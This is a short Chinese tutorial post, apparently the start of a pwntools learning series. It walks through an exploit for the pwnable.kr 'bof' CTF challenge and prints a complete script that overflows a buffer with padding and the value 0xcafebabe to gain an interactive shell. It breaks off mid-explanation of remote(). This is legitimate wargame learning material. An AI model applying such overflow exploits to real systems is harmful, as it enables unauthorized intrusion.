pwntools学习记录(一)

参考文章:https://bbs.pediy.com/thread-247217.htm 咱们先来就着上次写的bof的exp来说解一下web from pwn import * c = remote("pwnable.kr",9000) c.sendline("AAAA"*13+p32(0xcafebabe)) c.interactive() remote("一个域名或者ip地址", 端口)会链接
相关文章
相关标签/搜索